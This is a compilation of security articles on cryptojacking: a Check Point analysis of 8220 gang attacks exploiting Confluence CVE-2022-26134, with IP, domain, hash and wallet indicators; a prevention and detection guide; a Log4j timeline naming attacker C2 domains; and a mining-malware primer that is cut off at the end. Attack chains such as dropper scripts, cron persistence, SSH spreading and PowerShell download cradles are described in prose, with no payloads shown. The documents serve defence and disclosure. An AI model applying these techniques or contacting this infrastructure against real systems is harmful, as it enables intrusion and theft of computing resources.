CVE-2022-26134. In The Wild Exploitation Check Point Research (CPR) researchers noticed a large number of exploitations attempts since the vulnerability was published. At first, many of the would-be attackers used scanning methods to identify vulnerable targets. After a few days, the attackers started to use the vulnerability to download malware to the affected systems. Among the exploitation logs, researchers noticed a few malicious payloads that are related to the same campaign and that originated from the same source but targeted different platforms: Linux and Windows. The infection chain depends on the victim’s operating system. The Linux OS Targeted Attack The attacker utilized the Atlassian 0-day vulnerability by sending a crafted HTTP request to the victim. Figure 2: A crafted HTTP request exploiting CVE-2022-26134 with a base64 encoded payload. The base64 string decodes into another base64 encoded string. Overall, researchers had to decode the string a few times to get the actual payload. Figure 3: The decoded base64 string. This script downloads a bash script file called xms from the remote C&C server to the victim’s tmp folder, executes it, and deletes it afterward. Figure 4: Part of the malicious xms script. The xms file is a dropper script. It uninstalls running agents from the victim’s machine and adds itself to cron jobs to maintain persistence upon reboot. In addition, a network connectivity test to a[.]oracleservice.top is performed constantly. In an attempt to spread to other machines, the script searches for ssh keys and tries to connect. It then downloads the xms file from the C&C server and executes it. The script downloads an elf executable file called dbused to the tmp folder in various remote IPs. The dbused file is packed using upx to avoid static detection. The elf file is a crypto miner that exhausts the victim machine’s resources: Figure 5: The dbused process exhausts the system resources. The Windows OS Targeted Attack The attacker utilized the Atlassian vulnerability to execute a PowerShell download cradle to initiate a fileless attack from a remote C&C server. Figure 6: A crafted HTTP request exploiting CVE-2022-26134 using PowerShell commands. The lol.ps1 script is injected to a PowerShell memory process. The script verifies the processor’s architecture, using wmi to check whether it matches its requirements. It then downloads an executable file called checkit2 to the tmp folder and runs it in hidden mode. Figure 7: The lol.ps1 script. The checkit2.exe process spawns a child process, called InstallUtil.exe, which connects to the C&C server. The InstallUtil.exe in turn spawns another child process child process, AddInProcess.exe, which is the crypto miner. After a few moments of running on the victim’s machine, the checkit2 process terminates itself. Figure 8: The checkit2.exe process running on the system. Figure 9: The InstallUtil.exe process running on the system. The malware downloads a new copy of itself, with a new name, to the Start Menu folder. Figure 10: The cloud.exe file downloaded to the Startup folder. The crypto miner now runs on the machine and exhausts all the system’s resources: Figure 11: Crypto wallet information. Attack chain Both attack scenarios start with an initial crafted HTTP request exploiting the CVE-2022-26134 vulnerability. The attacker executes commands using the Java execution function to download a malicious payload to the victim’s machine. The malicious payload then downloads an executable file according to the affected OS. Both executables run a crypto miner to utilize the victim’s resources for their own benefit. Threat Actors The a[.]oracleservice.top domain and the crypto wallet we extracted from the system are related to a cybercriminal group called the “8220 gang”. Check Point Protections: IPS: Atlassian Confluence Remote Code Execution (CVE-2022-26134) Anti-Bot: Trojan.WIN32.XMRig IOCs: 198.251.86[.]46 51.79.175[.]139 167.114.114[.]169 146.59.198[.]38 51.255.171[.]23 a.oracleservice[.]top d2bae17920768883ff8ac9a8516f9708967f6c6afe2aa6da0241abf8da32456e 2622f6651e6eb01fc282565ccbd72caba9844d941b9d1c6e6046f68fc873d5e0 4e48080f37debd76af54a3231ecaf3aa254a008fae1253cdccfcc36640f955d9 4b8be1d23644f8cd5ea22fa4f70ee7213d56e3d73cbe1d0cc3c8e5dfafe753e0 Monero Wallet: 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ Cryptojacking explained: How to prevent, detect, and recover from it Criminals are using ransomware-like tactics and poisoned websites to get your employees’ computers to mine cryptocurrencies. Here’s what you can do to stop it. Cryptojacking definition Cryptojacking is the unauthorized use of someone else’s compute resources to mine cryptocurrency. Hackers seek to hijack any kind of systems they can take over—desktops, servers, cloud infrastructure and more—to illicitly mine for crypto coins. Regardless of the delivery mechanism, cryptojacking code typically works quietly in the background as unsuspecting victims use their systems normally. The only signs they might notice is slower performance, lags in execution, overheating, excessive power consumption, or abnormally high cloud computing bills. How cryptojacking works Coin mining is a legitimate process in the cryptocurrency world that releases new cryptocurrency into circulation. The process works by rewarding currency to the first miner who solves a complex computational problem. That problem completes blocks of verified transactions that are added to the cryptocurrency blockchain. “Miners are essentially getting paid for their work as auditors. They are doing the work of verifying the legitimacy of Bitcoin transactions,” detailed a recent Investopedia explainer on how Bitcoin mining works. “In addition to lining the pockets of miners and supporting the Bitcoin ecosystem, mining serves another vital purpose: It is the only way to release new cryptocurrency into circulation.” Earning cryptocurrency via coin mining typically takes a huge amount of processing power and energy to carry off. Additionally, the cryptocurrency ecosystem is designed in a way that makes mining harder and reduces the rewards for it over time and with more mining competition. This makes legitimate cryptocurrency coin mining an extremely costly affair, with expenses rising all the time. Cybercriminals slash mining overhead by simply stealing compute and energy resources. They use a range of hacking techniques to gain access to systems that will do the computational work illicitly and then have these hijacked systems send the results to a server controlled by the hacker. Cryptojacking attack methods The attack methods are limited only by the cryptojackers’ creativity, but the following are some of the most common ones used today. Endpoint attacks In the past, cryptojacking was primarily an endpoint malware play, existing as yet another moneymaking objective for dropping malware on desktops and laptops. Traditional cryptojacking malware is delivered via typical routes like fileless malware, phishing schemes, and embedded malicious scripts on websites and in web apps. The most basic way cryptojacking attackers can steal resources is by sending endpoint users a legitimate-looking email that encourages them to click on a link that runs code to place a cryptomining script on their computer. It runs in the background and sends results back via a command and control (C2) infrastructure. Another method is to inject a script on a website or an ad that is delivered to multiple websites. Once victims visit the website or the infected ad pops up in their browsers, the script automatically executes. No code is stored on the victims’ computers. These avenues still remain a legitimate concern, though criminals have added significantly more sophisticated techniques to their cryptojacking playbooks as they seek to scale up profits, with some of these evolving methods described below. Scan for vulnerable servers and network devices Attackers seek to amp up the profitability of cryptojacking by expanding their horizons to servers, network devices, and even IoT devices. Servers, for example, are a particularly juicy target since they usually are usually higher powered than a run-of-the-mill desktop. They’re also a prime hunting ground in 2022 as the bad guys scan for servers exposed to the public internet that contain vulnerabilities such as Log4J, exploiting the flaw and quietly loading cryptomining software on the system that’s connected to the hacker’s servers. Often attackers will use the initially compromised system to move their cryptojacking laterally into other network devices. “We’re seeing an uptick in cryptomining stemming from the Log4J vulnerability,” says Sally Vincent, senior threat research engineer for LogRhythm. “Hackers are breaking into networks and installing malware that uses storage to mine cryptos.” Software supply chain attacks Cybercriminals are targeting the software supply chain by seeding open-source code repositories with malicious packages and libraries that contain cryptojacking scripts embedded within their code. With developers downloading these packages by the millions around the globe, these attacks can rapidly scale up cryptojacking infrastructure for the bad guys in two ways. The malicious packages can be used to target developer systems—and the networks and cloud resources they connect to—to use them directly as illicit cryptomining resources. Or they can leverage these attacks to poison the software that these developers are building with components that execute cryptomining scripts on the machines of an application’s end user. Leveraging cloud infrastructure Many cryptojacking enterprises are taking advantage of the scalability of cloud resources by breaking into cloud infrastructure and tapping into an even broader collection of compute pools to power their mining activity. A study last fall by Google’s Cybersecurity Action Team reported that 86% of compromised cloud instances are used for cryptomining. “Today, attackers are targeting cloud services by any means to mine more and more cryptocurrency, as cloud services can allow them to run their calculations on a larger scale than just a single local machine, whether they’re taking over a user’s managed cloud environment or even abusing SaaS applications to execute their calculations,” Guy Arazi, senior security researcher for Palo Alto Networks, wrote in a blog post. One of the common methods to do this is by scanning for exposed container APIs or unsecured cloud storage buckets and using that access to start loading coin-mining software on impacted container instances or cloud servers. The attack is typically automated with scanning software that looks for servers accessible to the public internet with exposed APIs or unauthenticated access possible. Attackers generally use scripts to drop the miner payloads onto the initial system and to look for ways to propagate across connected cloud systems. “The profitability and ease of conducting cryptojacking at scale makes this type of attack low-hanging fruit,” said Matt Muir, security researcher for Cado Security, in a blog post explaining that cloud-based attacks are particularly lucrative. “This will likely continue for as long as users continue to expose services such as Docker and Redis to untrusted networks.” Why cryptojacking is popular According to a report by ReasonLabs, in the last year 58.4% of all Trojans detected were cryptojacking coin miners. Meantime, another study by SonicWall found that 2021 was the worst year to date for cryptojacking attacks, with the category logging 97.1 million attacks over the course of the year. These numbers are so strong because cryptojacking is virtually minting money for cybercriminals. When a crook can mine for cryptocurrency on a seemingly limitless pool of free compute resources from victim machines, the upside for them is huge. Even with the precipitous drop in Bitcoin valuation this spring that brought it below the $30,000 level, cryptojackers’ illicit margins still make business sense as the value of what they mine far outstrips the costs of their criminal infrastructure. Real-world cryptojacking examples WatchDog targets Docker Engine API endpoints and Redis servers A honeypot from the security research team at Cado Labs discovered a multi-stage cryptojacking attack that targets exposed Docker Engine API endpoints and Redis servers, and can propogate in a worm-like fashion. The attack is perpetrated by the WatchDog attack group, which has been particularly active in late 2021 and 2022 with numerous cryptojacking campaigns. Alibaba ECS instances in cryptomining crosshairs TeamTNT was one of the first hacking groups to shift cryptojacking focus heavily to cloud-oriented services. Researchers with TrendMicro in late 2021 reported that this group, along with rivals like the Kinsig gang, were conducting cryptojacking campaigns that installed miners in Alibaba Elastic Computing Service (ECS) instances and disabling security features to evade detection. Miner bots and backdoors use Log4J to attack VMware Horizon servers The Log4Shell vulnerability has been a boon to cryptojacking attackers in 2022. In one marked example, Sophos researchers found earlier this year that a ‘horde’ of attackers were targeting VMware Horizon servers to deliver a range of crypojacking payloads that included the z0Miner, the JavaX miner and at least two XMRig variants, Jin and Mimu cryptocurrency miner bots. Supply chain attacks via npm libraries The software supply chain security experts at Sonatype in fall of 2021 sounded the alarm on malicious cryptomining packages hiding in npm, the JavaScript package repository used by developers worldwide. At the time it found a trio of packages, at least one of which was impersonating a popular, legitimate library used by developers called “ua-parser-js,” which gets over 7 million weekly downloads and would be an ideal way to lure in developers to accidentally download a malicious bit of code and install it in their software. A few months after that report, researchers WhiteSource (now Mend) released an additional report that showed npm is swarming with malicious code—as many as 1,300 malicious packages that include cryptojacking and other nefarious behavior. Romanian attackers target Linux machines with cryptomining malware Last summer Bitdefender discovered a Romanian threat group that was targeting Linux-based machines with SSH credentials to deploy Monero mining malware. The tools they used were distributed on an as-a-service model. This example was on the spear tip of what appears to be a growing trend of Linux system cryptomining attacks. A report earlier this year from VMware detailed a growing targeting of Linux-based multi-cloud environments, particularly using the XMRig mining software. “Many of the cryptomining samples from Linux-based systems have some relationship to the XMRig application,” explained the report, which showed that 89% of cryptomining attacks used XMRig-related libraries. “Therefore, when XMRig-specific libraries and modules in Linux binaries are identified, it is likely evidence of potential cryptomining behavior. CoinStomp uses sophisticated evasion tactics CoinStop is another cryptojacking campaign recently discovered to be targeting Asian cloud service providers (CSPs). This one distinguished itself by its anti-forensics and evasion measures. These included timestomping to manipulate system timestamps, removal of system cryptographic policies, and the use of the he /dev/tcp device file to create a reverse shell session, explained Cado’s Muir in a report on the attack. Cryptocurrency farm found in warehouse Cryptojackers can sometimes go to great lengths to steal not only processing power but also energy and network resources from corporate infrastructure. Last year Darktrace analysts highlighted an anonymous example from one of its clients where it discovered a cryptomining farm in a warehouse that was disguised inside an unassuming set of cardboard boxes. Inside was a stealthy rig running multiple GPUs that were hooked into the company’s network power, How to prevent cryptojacking As it has evolved into a multi-vector attack that spans across endpoint, server, and cloud resources, preventing cryptojacking takes an orchestrated and well-rounded defense strategy. The following steps can help prevent cryptojacking from running rampant on enterprise resources. Employ strong endpoint protection: The foundation of that is using endpoint protection and anti-malware that’s capable of detecting cryptominers, as well as keeping web filters up to date and managing browser extension to minimize risk of browser-based scripts from executing. Organizations should ideally look for endpoint protection platforms that can extend out to servers and beyond. Patch and harden servers (and everything else). Cryptojackers tend to look for the lowest hanging fruit that they can quietly harvest—that includes scanning for publicly exposed servers containing older vulnerabilities. Basic server hardening that includes patching, turning off unused services, and limiting external footprints can go a long way toward minimizing the risk of server-based attacks. Use software composition analysis. Software composition analysis (SCA) tools provide better visibility into what components are being used within software to prevent supply chain attacks that leverage coin mining scripts. Hunt down cloud misconfigurations. One of the most impactful ways organizations can stop cryptojacking in the cloud is by tightening cloud and container configurations. That means finding cloud services exposed to the public internet without proper authentication, rooting out exposed API servers, and eliminating credentials and other secrets stored in developer environments and hardcoded into applications. How to detect cryptojacking Cryptojacking is a classic low-and-slow cyberattack designed to leave minimal signs behind to avoid long-term detection. While endpoint protection platforms and endpoint detection and response technologies have come a long way in alerting to cryptojacking attacks, the bad guys are masters of evasion on this front and detecting illicit coin miners can still prove difficult, especially when only a few systems are compromised. The following are some additional methods for flagging signs of cryptojacking. Train your help desk to look for signs of cryptomining. Sometimes the first indication on user endpoints is a spike in help desk complaints about slow computer performance. That should raise a red flag to investigate further, as could devices over-heating or poor battery performance in mobile devices. Deploy a network monitoring solution. Network monitoring tools can offer a powerful tool in picking up on the kinds of web traffic and outbound C2 traffic that indicates cryptojacking activity, no matter the device it is coming from. “If you have good egress filtering on a server where you’re watching for outbound connection initiation, that can be good detection for [cryptomining malware],” ],” says Travis Farral, vice president and CISO at Archaea Energy. He warns, though, that cryptominer authors can write their malware to avoid that detection method. Use cloud monitoring and container runtime security. Evolving tools like cloud monitoring and container runtime security scanning can offer additional visibility into cloud environments that may be impacted by unauthorized cryptominers. Cloud providers are baking in this kind of visibility into their service, sometimes as add-ons. For instance, Google Cloud expanded its Security Command Center earlier this year to include what it calls its Virtual Machine Threat Detection (VMTD) to pick up on signs of cryptomining in the cloud, among other cloud threats. Engage in regular threat hunts. Since so many cryptojacking attacks are stealthy and leave few tracks, organizations may need to take more active measures like threat hunting to regularly seek out subtle signs of compromise and follow through with investigations. “Endpoint security and SOC teams should invest time into active exercises and threat hunts instead of waiting around for something potentially catastrophic to happen,” LogRhythm’s Vincent says. Monitor your websites for cryptomining code. Farral warns that cryptojackers are finding ways to place bits of Javascript code on web servers. “The server itself isn’t the target, but anyone visiting the website itself [risks infection],” he says. He recommends regularly monitoring for file changes on the web server or changes to the pages themselves. How to respond to a cryptojacking attack After illicit cryptomining activity has been detected, responding to a cryptojacking attack should follow standard cyber incident response steps that include containment, eradication, recovery, and lessons learned. Some tips for how to respond to a cryptojacking attack include: Kill web-delivered scripts. For in-browser JavaScript attacks, the solution is simple once cryptomining is detected: Kill the browser tab running the script. IT should note the website URL that’s the source of the script and update the company’s web filters to block it. Shut down compromised container instances. Immutable cloud infrastructure like container instances that are compromised with coin miners can also be handled simply, by shutting down infected container instances and starting fresh. However, organizations must dig into the root causes that led to the container compromise in the first place. This means looking for signs that the container dashboard and credentials have been compromised and examining connected cloud resources for signs of compromise. A key step is ensuring that the fresh new container image to replace the old one isn’t similarly configured. Reduce permissions and regenerate API keys. Eradicating and fully recovering from cloud-based cryptojacking will require organizations to reduce permissions to impacted cloud resources (and those connected to them) and regenerating API keys to prevent attackers from walking right back into the same cloud environment. Learn and adapt. Use the experience to better understand how the attacker was able to compromise your systems. Update your user, helpdesk, IT, and SOC analyst training so they are better able to identify cryptojacking attempts and respond accordingly. Editor’s note: This article, orginally published in February 2018, has been updated to include new research, best practices, and cryptojacking examples. The Apache Log4j vulnerabilities: A timeline The Apache Log4j vulnerability has impacted organizations around the globe. Here is a timeline of the key events surrounding the Log4j exploit as they have unfolded. The Apache Log4j vulnerability has made global headlines since it was discovered in early December. The flaw has impacted vast numbers of organizations around the world as security teams have scrambled to mitigate the associated risks. Here is a timeline of the key events surrounding the Log4j vulnerability as they have unfolded. Thursday, December 9: Apache Log4j zero-day exploit discovered Apache released details on a critical vulnerability in Log4j, a logging library used in millions of Java-based applications. Attackers began exploiting the flaw (CVE-2021-44228) – dubbed “Log4Shell”, which was rated 10 out of 10 on the CVSS vulnerability rating scale. It could lead to remote code execution (RCE) on underlying servers that run vulnerable applications. “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled,” Apache developers wrote in an advisory. A fix for the issue was made available with the release of Log4j 2.15.0 as security teams from around the globe worked to protect their organizations. Businesses were urged to install the latest version. Friday, December 10: UK NCSC issues Log4j warning to UK organizations As the fallout from the vulnerability continued, the UK’s National Cyber Security Centre (NCSC) issued a public warning to UK companies about the flaw and outlined strategies for mitigation. The NCSC advised all organizations to install the latest update immediately wherever Log4j was known to be used. “This should be the first priority for all UK organizations using software that is known to include Log4j. Organizations should update both internet-facing and non-internet facing software,” the statement read. Businesses were also urged to seek out unknown instances of Log4j and deploy protective network monitoring/blocking. Saturday, December 11: CISA director comments on “urgent challenge to network defenders” Much like the UK’s NCSC, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) publicly responded to the Log4j vulnerability with director Jen Easterly reflecting upon the urgent challenge it presented to network defenders. “CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the Log4j software library,” she said in a statement. “We are taking urgent action to drive mitigation of this vulnerability and detect any associated threat activity. We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies – and signals to non-federal partners – to urgently patch or remediate this vulnerability. We are proactively reaching out to entities whose networks may be vulnerable and are leveraging our scanning and intrusion detection tools to help government and industry partners identify exposure to or exploitation of the vulnerability.” CISA recommended asset owners to take three additional, immediate steps to help mitigate the vulnerability: Enumerate any external facing devices that have Log4j installed Ensure security operations centers are actioning every single alert on the devices that fall into the category above Install a web application firewall with rules that automatically update so that security operations centers (SOCs) can concentrate on fewer alerts Tuesday, December 14: Second Log4j vulnerability carrying denial-of-service threat detected, new patch released A second vulnerability impacting Apache Log4j was discovered. The new exploit, CVE 2021-45046, allowed malicious actors to craft malicious input data using a JNDI lookup pattern to create denial-of-service (DoS) attacks, according to the CVE description. A new patch for the exploit was made available which removed support for message lookup patterns and disabled JNDI functionality by default, with the Log4j 2.15.0 fix for the original flaw incomplete in certain non-default configurations. “While CVE-2021-45046 is less severe than the original vulnerability, it becomes another vector for threat actors to conduct malicious attacks against unpatched or improperly patched systems,” Amy Chang, head of risk and response at Resilience, told CSO shortly after the flaw was discovered. “The incomplete patch to CVE-2021-44228 could be abused to craft malicious input data, which could result in a DoS attack. A DoS attack can shut down a machine or network and render it inaccessible to its intended users,” she added. Organizations were advised to update to Log4j: 2.16.0 as soon as possible. Friday, December 17: Third Log4j vulnerability revealed, new fix made available Apache published details of a third major Log4j vulnerability and made yet another fix available. This was an infinite recursion flaw rated 7.5 out of 10. “The Log4j team has been made aware of a security vulnerability, CVE-2021-45105, that has been addressed in Log4j 2.17.0 for Java 8 and up,” it wrote. “Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DoS (denial-of-service) attack.” Apache also outlined the following mitigations: In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId}or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC) Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input Monday, December 20: Log4j exploited to install Dridex and Meterpreter Cybersecurity research group Cryptolaemus warned that the Log4j vulnerability was being exploited to infect Windows devices with the Dridex banking Trojan and Linux devices with Meterpreter. Dridex is a form of malware that steals bank credentials via a system that uses macros from Microsoft Word, while Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore a target machine and execute code. Cryptolaemus member Joseph Roosen told BleepingComputer that threat actors use the Log4j RMI (Remote Method Invocation) exploit variant to force vulnerable devices to load and execute a Java class from an attacker-controlled remote server. Wednesday, December 22: Data shows 10% of all assets vulnerable to Log4Shell Data released by cybersecurity vendor Tenable revealed that that one in 10 of all assets were vulnerable to Log4Shell, while 30% of organizations had not begun scanning for the bug. “Of the assets that have been assessed, Log4Shell has been found in approximately 10% of them, including a wide range of servers, web applications, containers and IoT devices,” read a Tenable blog posting. “Log4Shell is pervasive across all industries and geographies. One in 10 corporate servers being exposed. One in 10 web applications and so on. One in 10 of nearly every aspect of our digital infrastructure has the potential for malicious exploitation via Log4Shell.” The vendor warned that Log4Shell carries a greater potential threat than EternalBlue (exploited in the WannaCry attacks) because of the pervasiveness of Log4j across both infrastructure and applications. “No single vulnerability in history has so blatantly called out for remediation. Log4Shell will define computing as we know it, separating those that put in the effort to protect themselves and those comfortable being negligent,” it added. Tuesday, January 4: FTC tells companies to patch Log4j vulnerability, threatens legal action The Federal Trade Commission (FTC) urged U.S. organizations to patch the Log4Shell vulnerability immediately or risk facing punitive action from the agency. “When vulnerabilities are discovered and exploited, it risks a loss or breach of personal information, financial loss, and other irreversible harms. The duty to take reasonable steps to mitigate known software vulnerabilities implicates laws including, among others, the Federal Trade Commission Act and the Gramm Leach Bliley Act,” the FTC said. It added that it is critical that companies and their vendors relying on Log4j act now to reduce the likelihood of harm to consumers and to avoid FTC legal action. “The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.” Monday, January 10: Microsoft warns of China-based ransomware operator exploiting Log4Shell Microsoft updated its Log4j vulnerability guidance page with details of a China-based ransomware operator (DEV-0401) targeting internet-facing systems and deploying the NightSky ransomware. “As early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon,” it wrote. “DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).” Based on Microsoft’s analysis, attackers were discovered to be using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203. Security 101: The Impact of Cryptocurrency-Mining Malware The Australian government has just recognized digital currency as a legal payment method. Since July 1, purchases done using digital currencies such as bitcoin are exempt from the country’s Goods and Services Tax to avoid double taxation. As such, traders and investors will not be levied taxes for buying and selling them through legal exchange platforms. Japan, which legitimized bitcoin as a form of payment last April, already expects more than 20,000 merchants to accept bitcoin payments. Other countries are joining the bandwagon, albeit partially: businesses and some of the public organizations in Switzerland, Norway, and the Netherlands. In a recent study, unique, active users of cryptocurrency wallets are pegged between 2.9 and 5.8 million, most of which are in North America and Europe. But what does the acceptance and adoption of digital currencies have to do with online threats? A lot, actually. As cryptocurrencies like bitcoin gain real-world traction, so will cybercriminal threats that abuse it. But how, exactly? What does this mean to businesses and everyday users? What is cryptocurrency? Cryptocurrency is an encrypted data string that denotes a unit of currency. It is monitored and organized by a peer-to-peer network also known as a blockchain, which also serves as a secure ledger of transactions, e.g., buying, selling, and transferring. Unlike physical money, cryptocurrencies are decentralized, which means they are not issued by governments or other financial institutions. Cryptocurrencies are created (and secured) through cryptographic algorithms that are maintained and confirmed in a process called mining, where a network of computers or specialized hardware such as application-specific integrated circuits (ASICs) process and validate the transactions. The process incentivizes the miners who run the network with the cryptocurrency. Bitcoin isn’t the be-all and end-all There are actually over 700 cryptocurrencies, but only some are readily traded and even less have market capitalization above $100 million. Bitcoin, for instance, was created by Satoshi Nakamoto (pseudonym) and released in 2009 as open-source code. Blockchain technology made it all work, providing a system where data structures (blocks) are broadcasted, validated, and registered in a public, distributed database through a network of communication endpoints (nodes). While bitcoin is the most famous cryptocurrency, there are other popular alternatives. Ethereum took “smart contracts” up a notch by making the programming languages needed to code them more accessible to developers. Agreements, or conditional/if-then transactions, are written as code and executed (as long as requirements are met) in Ethereum’s blockchain. Ethereum, however, earned notoriety after a hacker exploited a vulnerability in the Digital Autonomous Organization (DAO) running on Ethereum’s software, siphoning US $50 million worth of ether (Ethereum’s currency). This resulted in the development of Ethereum Classic, based the original blockchain, and Ethereum, its upgraded version (via a hard fork). There are also other notable cryptocurrencies: Litecoin, Dogecoin, Monero. Litecoin is a purportedly technical improvement of Bitcoin that is capable of faster turnarounds via its Scrypt mining algorithm (Bitcoin uses SHA-256). The Litecoin Network is able to produce 84 million Litecoins—four times as many cryptocurrency units issued by Bitcoin. Monero is notable for its use of ring signatures (a type of digital signature) and CryptoNote application layer protocol to protect the privacy of its transactions—amount, origin, and destination. Dogecoin, which was initially developed for educational or entertainment purposes, was intended for a broader demographic. Capable of generating uncapped dogecoins, it also uses Scrypt to drive the currency along. Cryptocurrency mining also drew cybercriminal attention Cryptocurrencies have no borders—anyone can send them anytime anywhere, without delays or additional/hidden charges from intermediaries. Given their nature, they are more secure from fraud and identity theft as cryptocurrencies cannot be counterfeited, and personal information is behind a cryptographic wall. Unfortunately, the same apparent profitability, convenience, and pseudonymity of cryptocurrencies also made them ideal for cybercriminals, as ransomware operators showed. The increasing popularity of cryptocurrencies coincide with the incidences of malware that infect systems and devices, turning them into armies of cryptocurrency-mining machines. Cryptocurrency mining is a computationally intensive task that requires significant resources from dedicated processors, graphics cards, and other hardware. While mining does generate money, there are many caveats. The profit is relative to a miner’s investment on the hardware, not to mention the electricity costs to power them. Cryptocurrencies are mined in blocks; in bitcoin, for instance, each time a certain number of hashes are solved, the number of bitcoins that can be awarded to the miner per block is halved. Since the bitcoin network is designed to generate the cryptocurrency every 10 minutes, the difficulty of solving another hash is adjusted. And as mining power increases, the resource requirement for mining a new block piles up. Payouts are relatively small and eventually decrease every four years—in 2016, the reward for mining a block was halved to 12.5 BTC (or $32,000 as of July 5, 2017). Consequently, many join forces into pools to make mining more efficient. Profit is divided between the group, depending on how much effort a miner exerted. Cryptocurrency-mining malware use similar attack vectors Bad guys turn to using malware to skirt around these challenges. There is, however a caveat for cybercriminal miners: internet-connected devices and machines, while fast enough to process network data, don’t have extensive number-crunching capabilities. To offset this, cryptocurrency-mining malware are designed to zombify botnets of computers to perform these tasks. Others avoided subtlety altogether—in 2014, Harvard’s supercomputer cluster Odyssey was used to illicitly mine dogecoins. During the same year, a similar incident happened to US agency National Science Foundation’s own supercomputers. In early February 2017, one of the US Federal Reserve’s servers was misused to mine for bitcoins. Cryptocurrency-mining malware employ the same modus operandi as many other threats—from malware-toting spam emails and downloads from malicious URLs to junkware and potentially unwanted applications (PUAs). In January 2014, a vulnerability in Yahoo!’s Java-based advertisement network was compromised, exposing European end users to malvertisements that delivered a bitcoin-mining malware. A month before it, German law enforcement arrested hackers for purportedly using malware to mine over $954,000 worth of bitcoins. We’ve seen the emergence of hacking tools and backdoors related to cybercriminal bitcoin mining as early as 2011, and we’ve since seen a variety of cryptocurrency-mining threats that add more capabilities, such as distributed denial-of-service and URL spoofing. Another even tried to masquerade as a component for one of Trend Micro’s products. In 2014, the threat crossed over to Android devices as Kagecoin, capable of mining bitcoin, litecoin, and dogecoin. A remote access Trojan (RAT) njrat/Njw0rm readily shared in the Middle Eastern underground was modified to add bitcoin-mining functionality. The same was done to an old Java RAT that can mine litecoin. This year’s notable cryptocurrency-mining malware so far are Adylkuzz, CPUMiner/EternalMiner, and Linux.MulDrop.14. All exploit vulnerabilities. Adylkuzz leverages EternalBlue, the same security flaw that WannaCry ransomware used to destructive effect, while CPUMiner/EternalMiner used SambaCry, a vulnerability in interoperability software suite Samba. Linux.MulDrop.14, a Linux Trojan, targets Raspberry Pi devices. These threats infected devices and machines and turned them into monero-mining botnets. Cryptocurrency-mining malware’s impact makes them a credible threat Cryptocurrency-mining malware steal the resources of infected machines, significantly affecting their performance and increasing their wear and tear. An infection also involves other costs, like increased power consumption. But we’ve also found that their impact goes beyond performance issues. From January 1 to June 24, 2017, our sensors detected 4,894 bitcoin miners that triggered over 460,259 bitcoin-mining activities, and found that more than 20% of these miners also triggered web and network-based attacks. We even found intrusion attempts linked to a ransomware’s attack vector. The most prevalent of these attacks we saw were: Cross-site scripting Exploiting a remote code execution vulnerability in Microsoft’s Internet Information Server (IIS) Brute force and default password logins/attacks Command buffer overflow exploits Hypertext Preprocessor (PHP) arbitrary code injection SQL injection BlackNurse denial of service attack These malware can threaten the availability, integrity, and security of a network or system, which can potentially result in disruptions to an enterprise’s mission-critical operations. Information theft and system hijacking are also daunting repercussions. These attacks can also be the conduit from which additional malware are delivered. Internet of Things (IoT) devices are also in the crosshairs of cryptocurrency-mining malware—from digital video recorders (DVRs)/surveillance cameras, set-top boxes, network-attached storage (NAS) devices, and especially routers, given their ubiquity among home and corporate environments. In April 2017, a variant of Mirai surfaced with bitcoin-mining capabilities. Mirai’s notoriety sprung from the havoc it wrought in IoT devices, particularly home routers, using them to knock high-profile sites offline last year. Over the first three quarters of 2016, we detected a bitcoin-mining zombie army made up of Windows systems, home routers, and IP cameras. From January 1 to June 24, 2017, we also observed different kinds of devices that were mining bitcoin, although our telemetry cannot verify if these activities were authorized. We also saw bitcoin mining activities surge by 40% from 1,800 triggered events daily in February to 3,000 in March, 2017. While bitcoin mining isn’t inherently illegal (at least in many countries), it can entail a compromise if it doesn’t have the owner’s knowledge and consent. We found that machines running Windows had the most bitcoin mining activities, but also of note are: Systems on Macintosh OSes, including iOS (iPhone 4 to iPhone 7) Devices run on Ubuntu OS, a derivative of Debian Linux OS Home routers Environment-monitoring devices, used in data centers Android-run smart TVs and mobile devices IP cameras Print servers Gaming consoles [READ: How to secure your router against Mirai and home network attacks] Cryptocurrency-mining malware can make victims a part of the problem Cryptocurrency-mining malware can impair system performance and risk end users and businesses to information theft, hijacking, and a plethora of other malware. And by turning these machines into zombies, cryptocurrency malware can even inadvertently make its victims part of the problem. Indeed, their adverse impact to the devices they infect—and ultimately a business’ asset or a user’s data—makes them a credible threat. There is no silver bullet for these malware, but they can be mitigated by following these best practices: Regularly updating your device with the latest patches helps prevent attackers from using vulnerabilities as doorways into the systems Changing or strengthening the device’s default credentials makes the device less prone to unauthorized access Enabling the device’s firewall (for home routers), if available, or deploying intrusion detection and prevention systems to mitigate incursion attempts Taking caution against known attack vectors: socially engineered links, attachments or files from suspicious websites, dubious third-party software/applications, and unsolicited emails IT/system administrators and information security professionals can also consider application whitelisting or similar security mechanisms that prevent suspicious executables from running or installing. Proactively monitoring network traffic helps better identify red flags that may indicate malware infection. Applying the principle of least privilege, developing countermeasures against web injections, securing the email gateway, implementing best practices for corporate mobile 